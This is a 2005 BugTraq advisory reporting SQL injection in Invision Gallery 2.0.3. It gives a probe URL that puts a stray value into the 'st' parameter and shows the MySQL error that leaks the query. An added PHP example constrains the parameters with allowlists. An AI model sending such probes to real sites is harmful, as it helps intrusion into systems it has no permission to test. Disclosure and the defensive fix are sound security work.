BugTraq
SQL In Invision Gallery 2.0.3
Oct 30 2005 03:15PM
almaster hotmail com
Credit: By aLMaSTeR HaCKeR [ almaster (at) hotmail (dot) com ]

Vulnerable: Invision Gallery 2.0.3

EXPLOIT:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|aLMaSTeR

The Error:

mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated
FROM ibf_gallery_images i
LEFT JOIN ibf_members m ON ( m.id=i.member_id )
LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )
WHERE category_id=26 AND i.approved=1
GROUP BY i.id
ORDER BY pinned DESC, date DESC , i.id DESC LIMIT ', 20

SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 7
SQL error code:
Date: Sunday 30th of October 2005 04:53:19 PM

Thanks TO MY FRIENDS IN S4A.CC

almaster (at) s4a (dot) cc or almaster (at) hotmail (dot) com
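
The error output above shows the `st` request value reaching the `LIMIT` clause unvalidated, and `sort_key` / `order_key` appear to feed the `ORDER BY` clause of the same query. As an added example (not part of the original post and not Invision Gallery's own code), one way to constrain those three parameters before the query is assembled; the function name, the `views` and `rating` columns and the offset cap are assumptions.

```php
<?php
// Added example: not Invision Gallery code. The function name, the
// non-"date" column names and the offset cap are illustrative assumptions.

function build_listing_tail(array $request, int $perPage = 20): string
{
    // Column names and ASC/DESC cannot be bound as query parameters,
    // so request values may only select entries from fixed allowlists.
    $sortColumns = ['date' => 'date', 'views' => 'views', 'rating' => 'rating'];
    $directions  = ['ASC' => 'ASC', 'DESC' => 'DESC'];

    $sortKey  = $request['sort_key']  ?? 'date';
    $orderKey = $request['order_key'] ?? 'DESC';

    // is_string() rejects array input such as sort_key[]=x.
    $column = (is_string($sortKey) && isset($sortColumns[$sortKey]))
        ? $sortColumns[$sortKey]
        : 'date';
    $direction = (is_string($orderKey) && isset($directions[strtoupper($orderKey)]))
        ? $directions[strtoupper($orderKey)]
        : 'DESC';

    // st is the LIMIT offset: accept only an integer in a bounded range.
    // filter_var() returns false for non-numeric strings and for arrays.
    $offset = filter_var(
        $request['st'] ?? 0,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 1000000]]
    );
    if ($offset === false) {
        $offset = 0; // fall back to the first page instead of passing input through
    }

    // Only allowlisted strings and integers reach the SQL text.
    return sprintf(
        'ORDER BY pinned DESC, %s %s, i.id DESC LIMIT %d, %d',
        $column, $direction, $offset, $perPage
    );
}

// Constructed sample requests: the value from the post, a valid page, hostile sort input.
$samples = [
    ['sort_key' => 'date', 'order_key' => 'DESC', 'st' => '|aLMaSTeR'],
    ['sort_key' => 'views', 'order_key' => 'asc', 'st' => '40'],
    ['sort_key' => 'date, (SELECT 1)', 'order_key' => ['x'], 'st' => ['1']],
];
foreach ($samples as $sample) {
    echo build_listing_tail($sample), PHP_EOL;
}
```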
